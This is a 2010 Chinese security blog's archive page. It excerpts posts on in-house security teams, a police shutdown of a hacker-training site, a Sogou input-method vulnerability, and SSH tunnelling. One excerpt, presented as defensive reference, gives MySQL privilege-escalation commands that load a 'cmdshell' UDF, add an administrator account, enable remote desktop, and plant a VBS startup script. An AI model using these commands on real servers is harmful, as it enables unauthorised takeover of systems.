Entries in the ‘安全相关’ Category:
filed in 安全相关, 生活琐碎 on 3.06, 2010
原文http://hi.baidu.com/zyqq/blog/item/d698b31c5b42458087d6b6f8.html
转载开始:
今天在Google Reader里看到一个链接,说benjurry发表了些看法。
我是ben总的忠实粉丝,ben总是中国互联网企业的CSO第一人(严格起来应该算是CISO),他的成长轨迹应该是甲方安全从业人员最希望可以探索和参考的。
首先转载一下ben总的原文:
——————————–分割线———————–转载开始————————————————
我来简单介绍下各互联网公司的安全团队吧,不当的地方还望各位补充和指正。
1、为什么互联网公司要有自己的安全团队。
a,公司重视:互联网公司的业务特别依赖于网络,网络的稳定和安全直接关系的公司业务,甚至是公司的市值,因此需要重点保障;
b,市场不能完全满足:由于安全公司偏向于传统网络安全,比较关注漏洞、FW、IDS、Scanner、Anti-DDOS、UTM等通用性安全产品和技 术的研究,对于互联网公司的业务分析的相对少一些,因此短期内无法满足互联网公司的全部需求,因此在需要得到安全公司的服务外,还有不少安全需求无法解 决。
Tags: security
filed in 安全相关 on 2.25, 2010
文章来源http://www.laopi.org/article.asp?id=54
刚才写了半天,遨游又崩溃了,真的很无语。
年前猪崽子发了一个链接,大致是说“黑鹰安全网”又被端了。记得2006年2月21日,黑鹰因为CCTV2的曝光,就被端过一次,那会还叫“爱国者黑客”,原因是非法开设黑客培训班,大米(李强)同学就被请到公安局过。不过没多久,网站又慢慢开了,中间换过几次名字,后来稳定为最初的名字黑鹰。这次又被学员拖累,彻底被封了,大米也被笼了,不过这次的原因是非法提供黑客工具。
节选部分报道: 湖北警方近日成功摧毁以提供非法控制计算机信息系统程序为主要内容的国内规模最大的黑客培训网站“黑鹰安全网”。主要犯罪嫌疑人李某、张某已被依法逮捕。湖北省公安厅网络安全保卫总队相关负责人表示,这也是《刑法修正案(七)》将非法提供黑客工具行为入罪后侦破的国内首起典型案例。
Tags: hacker
filed in 安全相关 on 2.22, 2010
今天在大风的博客上看见题为《我们在做什么?将走向何方?》的文章,原文地址
http://hi.baidu.com/aullik5/blog/item/a2fbb110c6950e75ca80c4f8.html
觉得可以了解到企业内部安全部门的发展趋势,所以转载过来。
“我们在做什么?将走向何方?”
这本来是一个极具有哲学意味的命题,在读大学的时候,我的心理课程老师就专门给我们上过一堂这样的课。但今天在这里,我并不想探讨任何哲学或者人生的问题,只是想讲讲我对甲方安全发展方向的一些理解。对面临就业选择的朋友来说,可以作为一个参考。
Tags: security
filed in 0day, 安全相关 on 1.22, 2010
转载:
无意发现了一个很严重的漏洞,和当年3389 输入法漏洞相似。 不过暂时不影响未系统未加载搜狗输入法(未登录系统)。如果远程服务器装了 搜狗,登录系统后加载了搜狗,而又未及时注销或kill掉搜狗输入法直接关闭了远程连接,那么这些server 就很危险咯。
测试环境:
OS: windows 7 ultimate
搜狗输入法 4.3 正式版
漏洞过程描述:
Tags: 0day, security
filed in 安全相关 on 1.22, 2010
本文是转载,仅供系统管理人员安全防护参考之用!
一 UDF提权
这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:
create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user iis_user 123!@#abcABC /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:\web\3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);
二 VBS启动项提权
create table a (cmd text);
insert into a values (”set wshshell=createobject (””wscript.shell””) ” );
insert into a values (”a=wshshell.run (””cmd.exe /c net user iis_user [...]
Tags: MySQL, security
filed in 安全相关 on 1.11, 2010
应该是很古老的技术了,拿来凑数更新一下博客吧。至于SSH Tunnel代理有什么用途就留给读者思考吧。利用putty的ssh tunnel功能实现安全的代理,原理是当用putty ssh连接到远程服务器的时候,putty可以在本地开启一个端口,本地的应用程序连接到本地的这个端口。相当于putty在本地充当了一个socks代理服务器为本地的应用程序提供socks代理。
Tags: security, ssh, tunnel
